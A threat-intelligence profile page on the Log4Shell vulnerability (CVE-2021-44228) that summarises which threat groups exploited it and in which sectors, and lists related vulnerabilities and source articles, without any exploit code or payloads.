CVE-2021-44228

Vulnerability updated 3 months ago (2024-08-14T09:36:36.482Z)

Download STIX

Preview STIX

CVE-2021-44228, also known as the Log4Shell vulnerability, is a significant flaw in Apache's Log4j software. Disclosed in December 2021, it quickly became one of the most severe bugs due to its widespread usage and potential for exploitation. Various Advanced Persistent Threat (APT) actors attempted to exploit this vulnerability in systems such as ServiceDesk, but were unsuccessful. However, other groups like GOLD MELODY (UNC961) successfully exploited this vulnerability to access servers like MobileIron Core. The Log4Shell vulnerability has been used by various threat groups, including APT40, which is known for rapidly exploiting newly public vulnerabilities in widely-used software. In addition to Log4J, they have targeted software like Atlassian Confluence and Microsoft Exchange. Another group, TellYouThePass, a ransomware group active since 2019, has also exploited this vulnerability along with others in open-source web development languages. Despite being known for several years, CVE-2021-44228 remains a common exploit attempt, especially against educational institutions where it accounts for 74% of attempts. LockBit, a threat group, was responsible for 30% of ransomware incidents targeting the education sector using this exploit. The vulnerability continues to be of interest to both defenders and attackers, highlighting the need for continued vigilance and prompt patching of known vulnerabilities.

Description last updated: 2024-08-14T09:06:03.754Z

What's your take? (Question 1 of 5)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at. Create a free account to see the source evidence for each alias, and help fix any errors.

Alias Description	Votes
Log4Shell is a possible alias for CVE-2021-44228. Log4Shell is a significant software vulnerability (CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105) that exists in the Log4j Java-based logging utility. It was exploited by various Advanced Persistent Threat (APT) actors, including LockBit affiliates and GOLD MELODY (UNC961), to gain unauthorized	11

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Log4j

Vulnerability

Exploit

Remote Code ...

Exploits

RCE (Remote ...

Apt

exploited

Ransomware

Confluence

Operation Bl...

Malware

Apache

Ofbiz

Analyst Notes & Discussion

Be the first to leave your mark here! Log in to share your views and vote.

Associated Threat Actors

To see the evidence that has resulted in these threatActor associations, create a free account

Alias Description	Association Type	Votes
The APT40 Threat Actor is associated with CVE-2021-44228. APT40, a threat actor attributed to China, is a cyber espionage group that primarily targets countries of strategic importance to the Belt and Road Initiative. The group is known for its use of a variety of attack vectors, notably spear-phishing emails posing as individuals likely to be of interest	Unspecified	2
The APT41 Threat Actor is associated with CVE-2021-44228. APT41, also known as Winnti, is a threat actor suspected to be originating from China, with its activities dating back to as early as 2012. It has targeted organizations in at least 14 countries and has been associated with the use of at least 46 different code families and tools. The group's activi	Unspecified	2

Associated Vulnerabilities

To see the evidence that has resulted in these vulnerability associations, create a free account

Alias Description	Association Type	Votes
The CVE-2021-34473 Vulnerability is associated with CVE-2021-44228. CVE-2021-34473 is a significant software vulnerability that was discovered in Microsoft Exchange Server. This flaw, along with two others (CVE-2021-31207 and CVE-2021-34523), forms a chain of vulnerabilities known as ProxyShell. These vulnerabilities can be exploited together by remote attackers to	Unspecified	3
The CVE-2021-26084 Vulnerability is associated with CVE-2021-44228. CVE-2021-26084 is a critical vulnerability related to Atlassian's Confluence software. The flaw in the software design or implementation was first exploited as a zero-day, before its public disclosure in June 2022. It allowed remote attackers to execute code on a Confluence Server via injection atta	Unspecified	3
The vulnerability CVE-2021-34523 is associated with CVE-2021-44228.	Unspecified	2
The CVE-2021-44207 Vulnerability is associated with CVE-2021-44228. CVE-2021-44207 is a significant software vulnerability that was exploited by APT41, a prolific Chinese state-sponsored espionage group known for targeting both public and private sector organizations. This flaw in the USAHerds web application's design or implementation mirrors a previously reported	Unspecified	2
The Proxyshell Vulnerability is associated with CVE-2021-44228. ProxyShell is a vulnerability that affects Microsoft Exchange email servers, posing a significant risk to organizations worldwide. This flaw in software design or implementation allows attackers to exploit the system and gain unauthorized access. Since early 2021, Iranian government-sponsored APT ac	Unspecified	2
The CVE-2021-31207 Vulnerability is associated with CVE-2021-44228. CVE-2021-31207 is a significant software vulnerability that has been exploited by APT40, a group known for rapidly taking advantage of newly public vulnerabilities in widely used software. This particular vulnerability affects Atlassian Confluence and Microsoft Exchange, among other platforms, and a	Unspecified	2

Source Document References

Information about the CVE-2021-44228 Vulnerability was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source Link	CreatedAt	Title
CISA	6 days ago	2023 Top Routinely Exploited Vulnerabilities \| CISA
BankInfoSecurity	21 days ago	Breach Roundup: S&P Says Poor Remediation A Material Risk
CERT-EU	10 months ago	A Log4Shell Malware Campaign in the DNS Spotlight
DARKReading	4 months ago	Feds Warn of North Korean Cyberattacks on US Critical Infrastructure
CISA	4 months ago	North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs \| CISA
Securityaffairs	4 months ago	Cybersecurity agencies warn of China-linked APT40 's capabilities
CISA	4 months ago	People’s Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action \| CISA
Securityaffairs	5 months ago	ExCobalt Cybercrime group targets Russian organizations in multiple sectors
DARKReading	5 months ago	TellYouthePass Ransomware Group Exploits Critical PHP Flaw
InfoSecurity-magazine	6 months ago	Log4J Still Among Top Exploited Vulnerabilities, Cato Finds
DARKReading	8 months ago	Getting Security Remediation on the Boardroom Agenda
CERT-EU	9 months ago	What cyber threats face the education sector?
CERT-EU	9 months ago	Cybersecurity crisis in schools - Help Net Security
CERT-EU	9 months ago	Trustwave reveals cybersecurity threats targeting education sector
CERT-EU	9 months ago	How CVSS 4.0 changes (or doesn’t) the way we see vulnerability severity
CERT-EU	9 months ago	Sensor Intel Series: Top CVEs in December 2023
BankInfoSecurity	10 months ago	FritzFrog Botnet Exploits Log4Shell
Securityaffairs	10 months ago	Experts created a PoC for Apache OFBiz flaw CVE-2023-51467
CERT-EU	10 months ago	New PoC Exploit for Apache OfBiz Vulnerability Poses Risk to ERP Systems
CERT-EU	10 months ago	December 2023's Most Wanted Malware : The Resurgence of Qbot and FakeUpdates – Global Security Mag Online